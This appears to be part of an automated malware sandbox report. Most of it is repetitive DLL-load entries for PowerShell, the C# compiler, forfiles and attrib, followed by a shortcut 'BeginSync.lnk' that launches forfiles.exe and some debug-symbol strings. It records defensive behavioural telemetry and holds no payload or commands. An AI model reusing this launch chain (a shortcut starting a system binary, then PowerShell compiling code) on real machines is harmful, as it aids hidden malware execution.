Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: BeginSync.lnk.0.drLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: softy.pdb source: powershell.exe, 00000000.00000002.1785758813.000001AC21045000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbhBG" source: powershell.exe, 0000000B.00000002.1985627382.0000012D9C156000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll source: powershell.exe, 00000000.00000002.1785758813.000001AC21045000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2092832286.000001CA45FB1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbd source: powershell.exe, 00000000.00000002.1787154201.000001AC2146B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1787154201.000001AC2146B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2094252514.000001CA4600B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000000.00000002.1787154201.000001AC214CC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000F.00000002.2097911500.000001CA46248000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb3 source: powershell.exe, 00000000.00000002.1787154201.000001AC2143F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1984540562.0000012D9C12D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2096475420.000001CA461D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 0000000F.00000002.2096475420.000001CA461D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automationib.pdb_. source: powershell.exe, 0000000B.00000002.1984540562.0000012D9C12D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbXD source: powershell.exe, 00000000.00000002.1785758813.000001AC210D2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 00000000.00000002.1757321925.000001AC07012000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1787154201.000001AC2143F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1984540562.0000012D9C0FF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2096475420.000001CA461D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1785758813.000001AC210D2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1984540562.0000012D9C12D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: b.pdb source: powershell.exe, 0000000F.00000002.2097911500.000001CA46248000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb%* source: powershell.exe, 0000000B.00000002.1984540562.0000012D9C12D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbllndows" type="System.Configuration.IgnoreSection, System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" allowLocation="false" /> source: powershell.exe, 0000000B.00000002.1983254762.0000012D9BE7F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 0000000F.00000002.2097911500.000001CA46248000.00000004.00000020.00020000.00000000.sdmp
